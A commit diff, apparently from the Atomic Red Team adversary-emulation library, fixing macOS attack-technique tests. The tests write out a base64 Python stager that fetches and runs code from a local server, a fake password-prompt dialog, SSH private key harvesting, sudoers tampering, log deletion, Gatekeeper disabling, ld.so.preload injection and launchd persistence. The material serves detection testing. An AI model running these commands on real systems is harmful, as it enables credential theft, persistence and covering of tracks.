security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fix macOS tests (#1059)

Browse Source 
* Fix macOS tests

* Fix typo in T1574.006

* Replaced zsh with bash, add prereq_command

* Fix test name in T1053.004

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
hypnoticpattern
2020-06-17 18:57:14 -07:00
committed by GitHub
parent 61fab9a7c6
commit 83dce0dcfa
32 changed files with 302 additions and 175 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1027.001/T1027.001.yaml
+1 -1
View File
@@ -22,7 +22,7 @@ atomic_tests:
prereq_command: |
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
cp /bin/ls /tmp/evil-binary
cp /bin/ls #{file_to_pad}
executor:
command: |
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
atomics/T1037.004/T1037.004.yaml
+3 -2
View File
@@ -11,6 +11,7 @@ atomic_tests:
- macos
executor:
command: |
echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
name: sh
sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
elevation_required: true
name: bash
atomics/T1040/T1040.yaml
+10 -2
View File
@@ -33,10 +33,18 @@ atomic_tests:
description: Specify interface to perform PCAP on.
type: String
default: en0A
dependency_executor_name: /bin/zsh
dependencies:
- description: |
Check if at least one of the tools are installed on the machine.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
echo "Install tcpdump and/or tshark for the test to run."; exit 1;
executor:
command: |
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
sudo tcpdump -c 5 -nnni #{interface}
if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
name: bash
elevation_required: true
- name: Packet Capture Windows Command Prompt
atomics/T1053.004/T1053.004.yaml
+21 -41
View File
@@ -10,45 +10,25 @@ atomic_tests:
supported_platforms:
- macos
- linux
input_arguments:
script_location:
description: evil plist location
type: path
default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist
script_destination:
description: Path where to move the evil plist
type: path
default: /etc/emond.d/rules/atomicredteam_T1053_004.plist
empty_file:
description: Random name of the empty file used to trigger emond service
type: string
default: randomflag
executor:
name: manual
steps: |
1. Place this file in /etc/emond.d/rules/atomicredteam.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>atomicredteam</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v Tessa</string>
<string>I am a persistent startup item.</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
2. Place an empty file in /private/var/db/emondClients/
3. sudo touch /private/var/db/emondClients/randomflag
name: bash
elevation_required: true
command: |
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
cleanup_command: |
sudo rm #{script_destination}
sudo rm /private/var/db/emondClients/#{empty_file}
atomics/T1053.004/src/atomicredteam.plist → atomics/T1053.004/src/atomicredteam_T1053_004.plist
+15 -4
View File
@@ -4,7 +4,7 @@
<array>
<dict>
<key>name</key>
<string>atomicredteam</string>
<string>com.atomicredteam.t1053_004</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@@ -15,13 +15,24 @@
<array>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<string>/usr/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v Tessa</string>
<string>I am a persistent startup item.</string>
<string>10</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/usr/bin/touch</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>/tmp/T1053_004_atomicredteam</string>
</array>
<key>type</key>
<string>RunCommand</string>
atomics/T1056.002/T1056.002.yaml
+1 -1
View File
@@ -11,7 +11,7 @@ atomic_tests:
executor:
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
name: sh
name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
description: |
atomics/T1059.002/T1059.002.yaml
+1 -1
View File
@@ -13,6 +13,6 @@ atomic_tests:
- macos
executor:
command: |
osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\\\\\\\" | python &\\\"\"
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""
name: sh
atomics/T1059.003/T1059.003.yaml
+1 -1
View File
@@ -13,7 +13,7 @@ atomic_tests:
type: string
default: dir
script_path:
description: Path of script to create.
description: Script path.
type: path
default: $env:TEMP\T1059.003_script.bat
dependency_executor_name: powershell
atomics/T1059.004/T1059.004.yaml
+11 -4
View File
@@ -8,12 +8,19 @@ atomic_tests:
supported_platforms:
- macos
- linux
input_arguments:
script_path:
description: Script path
type: path
default: /tmp/art.sh
executor:
command: |
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
cleanup_command: |
rm #{script_path}
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
atomics/T1069.001/T1069.001.yaml
+1 -1
View File
@@ -10,7 +10,7 @@ atomic_tests:
- linux
executor:
command: |
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
name: sh
atomics/T1083/T1083.yaml
+1 -1
View File
@@ -78,7 +78,7 @@ atomic_tests:
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}; fi;
cat #{output_file}
find . -type f -name ".*"
cleanup_command: 'rm #{output_file}'
name: sh
atomics/T1087.001/T1087.001.yaml
+1 -1
View File
@@ -34,7 +34,7 @@ atomic_tests:
default: /tmp/T1087.001.txt
executor:
command: |
cat /etc/sudoers > #{output_file}
sudo cat /etc/sudoers > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
atomics/T1090.001/T1090.001.yaml
+29
View File
@@ -26,6 +26,35 @@ atomic_tests:
unset http_proxy
unset https_proxy
name: sh
- name: Connection Proxy for macOS UI
description: |
Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host)
type: string
default: 127.0.0.1
proxy_port:
description: Proxy server port
type: string
default: 8080
interface:
description: Protocol to proxy (http or https)
type: string
default: Wi-Fi
executor:
name: sh
command: |
networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}
cleanup_command: |
networksetup -setwebproxystate #{interface} off
networksetup -setsecurewebproxystate #{interface} off
- name: portproxy reg key
auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a
description: |
atomics/T1136.001/T1136.001.yaml
+1 -1
View File
@@ -37,7 +37,7 @@ atomic_tests:
executor:
command: |
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
atomics/T1518.001/T1518.001.yaml
+1
View File
@@ -46,6 +46,7 @@ atomic_tests:
command: |
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
ps aux | grep falcond
name: sh
- name: Security Software Discovery - Sysmon Service
auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
atomics/T1543.001/T1543.001.yaml
+27 -29
View File
@@ -7,34 +7,32 @@ atomic_tests:
Create a plist and execute it
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist
dependency_executor_name: bash
dependencies:
- description: |
The shared library must exist on disk at specified location (#{path_to_shared_library})
prereq_command: |
if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "The shared library doesn't exist. Check the path"; exit 1;
executor:
steps: |
1. Create file - .client
2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
4.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>com.client.client</string>
<key>ProgramArguments</key>
<array>
<string>/Users/<update path to .clent file>/.client</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>NSUIElement</key>
<string>1</string>
</dict>
</plist>
5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
name: manual
name: bash
elevation_required: true
command: |
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
cleanup: |
sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename}
sudo rm ~/Library/LaunchAgents/#{plist_filename}
atomics/T1543.001/src/atomicredteam_T1543_001.plist
+17
View File
@@ -0,0 +1,17 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.atomicredteam.t1543_001</string>
<key>ProgramArguments</key>
<array>
<string>touch</string>
<string>/tmp/T1543_001_atomicredteam.txt</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>NSUIElement</key>
<string>1</string>
</dict>
</plist>
atomics/T1543.004/T1543.004.yaml
+30 -22
View File
@@ -5,26 +5,34 @@ atomic_tests:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: |
Utilize LaunchDaemon to launch `Hello World`
supported_platforms:
- macos
executor:
steps: |
1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
2.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.hello</string>
<key>ProgramArguments</key>
<array>
<string>hello</string>
<string>world</string>
</array>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
name: manual
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist
dependency_executor_name: bash
dependencies:
- description: |
The shared library must exist on disk at specified location (#{path_to_shared_library})
prereq_command: |
if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "The plist file doesn't exist. Check the path and try again."; exit 1;
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
cleanup: |
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
atomics/T1543.004/src/atomicredteam_T1543_004.plist
+15
View File
@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.atomicredteam.t1543_004</string>
<key>ProgramArguments</key>
<array>
<string>touch</string>
<string>/tmp/T1543_004_atomicredteam.txt</string>
</array>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
atomics/T1546.014/src/T1546.014_emond.plist
+35 -37
View File
@@ -4,42 +4,40 @@
<array>
<dict>
<key>name</key>
<string>Atomic Red Team T1165</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>30</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v</string>
<string>Karen</string>
<string>Hello from Atomic Red Team technique T1165</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
<string>AtomicRedTeam_T1546_014</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/usr/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>10</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/usr/bin/touch</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>/tmp/T1546_014_atomicredteam</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
atomics/T1547.007/T1547.007.yaml
+4 -1
View File
@@ -35,5 +35,8 @@ atomic_tests:
executor:
command: |
sudo defaults write com.apple.loginwindow LoginHook #{script}
cleanup: |
sudo defaults delete com.apple.loginwindow LoginHook
name: sh
elevation_required: true
name: sh
atomics/T1548.003/T1548.003.yaml
+6 -4
View File
@@ -14,11 +14,11 @@ atomic_tests:
executor:
name: sh
elevation_required: true
command: |
sudo -l
sudo su
cat /etc/sudoers
vim /etc/sudoers
sudo -l
sudo cat /etc/sudoers
sudo vim /etc/sudoers
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
@@ -31,6 +31,7 @@ atomic_tests:
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
@@ -46,6 +47,7 @@ atomic_tests:
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
atomics/T1551.002/T1551.002.yaml
+3 -2
View File
@@ -10,9 +10,10 @@ atomic_tests:
- linux
executor:
command: |
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
sudo rm -rf /private/var/log/system.log*
sudo rm -rf /private/var/audit/*
name: sh
elevation_required: true
- name: Overwrite Linux Mail Spool
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
description: |
atomics/T1552.001/T1552.001.yaml
+2 -1
View File
@@ -10,7 +10,8 @@ atomic_tests:
executor:
command: |
python2 laZagne.py all
name: sh
elevation_required: true
name: bash
- name: Extract passwords with grep
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
description: |
atomics/T1552.004/T1552.004.yaml
+26 -7
View File
@@ -21,14 +21,20 @@ atomic_tests:
- macos
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_file:
description: Output file containing locations of SSH key files
type: path
default: /tmp/keyfile_locations.txt
executor:
command: |
find / -name id_rsa >> #{output_file}
find / -name id_dsa >> #{output_file}
find #{search_path} -name id_rsa >> #{output_file}
find #{search_path} -name id_dsa >> #{output_file}
cleanup_command: |
rm #{output_file}
name: sh
- name: Copy Private SSH Keys with CP
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
@@ -37,6 +43,10 @@ atomic_tests:
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -44,8 +54,10 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
find / -name id_rsa -exec cp --parents {} #{output_folder} \;
find / -name id_dsa -exec cp --parents {} #{output_folder} \;
find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \;
cleanup_command: |
rm #{output_folder}
name: sh
- name: Copy Private SSH Keys with rsync
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
@@ -55,6 +67,10 @@ atomic_tests:
- macos
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -62,6 +78,9 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
find / -name id_rsa -exec rsync -R {} #{output_folder} \;
find / -name id_dsa -exec rsync -R {} #{output_folder} \;
name: sh
find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \;
cleanup_command: |
rm -rf #{output_folder}
name: sh
atomics/T1553.001/T1553.001.yaml
+2 -1
View File
@@ -16,4 +16,5 @@ atomic_tests:
command: |
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
name: sh
elevation_required: true
name: sh
atomics/T1555.001/T1555.001.yaml
+12 -3
View File
@@ -17,9 +17,18 @@ atomic_tests:
[Keychain dumper](https://github.com/juuso/keychaindump)
supported_platforms:
- macos
input_arguments:
cert_import:
description: Specify the path of the certificates to import.
type: path
default: /tmp/certs.pem
cert_export:
description: Specify the path of the certificates to export.
type: path
default: /tmp/certs.pem
executor:
command: |
security -h
security find-certificate -a -p > allcerts.pem
security import /tmp/certs.pem -k
name: sh
security find-certificate -a -p > #{cert_export}
security import #{cert_export} -k
name: sh
atomics/T1560.001/T1560.001.yaml
+1 -3
View File
@@ -153,15 +153,13 @@ atomic_tests:
- description: |
Files to zip must exist (#{input_files})
prereq_command: |
ls #{input_files}
if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo Please set input_files argument to include files that exist
executor:
name: sh
elevation_required: false
prereq_command: |
ls #{input_files} > /dev/null
command: |
zip #{output_file} #{input_files}
cleanup_command: |
atomics/T1564.001/T1564.001.yaml
+5
View File
@@ -100,6 +100,11 @@ atomic_tests:
Hide a directory on MacOS
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: /tmp/evil
executor:
command: |
touch /var/tmp/T1564.001_mac.txt
atomics/T1564.002/T1564.002.yaml
+4 -1
View File
@@ -15,4 +15,7 @@ atomic_tests:
executor:
command: |
sudo dscl . -create /Users/#{user_name} UniqueID 333
name: sh
cleanup_command: |
sudo dscl . -delete /Users/#{username}
elevation_required: true
name: sh
atomics/T1569.001/T1569.001.yaml
+13 -2
View File
@@ -7,7 +7,18 @@ atomic_tests:
Utilize launchctl
supported_platforms:
- macos
input_arguments:
executable_path:
description: Path of the executable to run.
type: path
default: /System/Applications/Calculator.app/Contents/MacOS/Calculator
label_name:
description: Path of the executable to run.
type: string
default: evil
executor:
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
name: sh
launchctl submit -l #{label_name} -- #{executable_path}
cleanup_command: |
launchctl remove #{label_name}
name: bash
atomics/T1574.006/T1574.006.yaml
+2 -1
View File
@@ -29,7 +29,8 @@ atomic_tests:
executor:
command: |
sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
cleanup_command: ""
cleanup_command: |
sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD